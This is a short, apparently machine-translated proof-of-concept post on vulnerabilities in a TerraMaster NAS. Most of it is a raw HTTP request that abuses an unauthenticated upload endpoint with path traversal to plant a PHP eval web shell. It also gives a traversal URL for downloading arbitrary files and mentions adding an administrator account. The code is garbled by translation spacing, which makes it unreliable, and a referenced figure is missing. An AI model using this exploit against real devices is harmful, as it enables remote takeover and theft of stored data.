TerraMaster NAS Network Storage Server unlimited getshell and other vulnerabilities (poc)

TerraMaster NAS Network Storage Server unlimited getshell and other vulnerabilities (poc)

Unlimited getshell, add any administrator, download any file, multiple information leaks ..


 

POST/include/upload. php? TargetDir = .. /cgi-bin/filemanage/HTTP/1.1 Accept: text/* Content-Type: multipart/form-data; boundary = ---------- ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3User-Agent: Shockwave FlashHost: Address Content-Length: 722Proxy-Connection: keep-AlivePragma: no-cacheCookie: PHPSESSID = ------------ ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3Content-Disposition: form-data; name = "Filename" 1. php ------------ ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3Content-Di Sposition: form-data; name = "name" 1. php ------------ ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3Content-Disposition: form-data; name = "chunk" 0 ------------ ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3Content-Disposition: form-data; name = "chunks" 1 ------------ ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3Content-Disposition: form-data; name = "file "; filename = "1.php" Content-Type: application/octet-stream <? Php @ eval ($ _ POST ['kako']);?> ------------ Ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3Content-Disposition: form-data; name = "Upload" Submit Query ------------ ei4KM7ae0KM7GI3ei4cH2ei4KM7GI3 --

Add an account whose username is aaaaaa and whose password is aaaaaa
 

 

Download any file (note that the downloaded php source code is encrypted)

Http: // address/cgi-bin/filemanage/download. php? File = ../include/upload. php

 

Multiple information leaks are shown in the figure.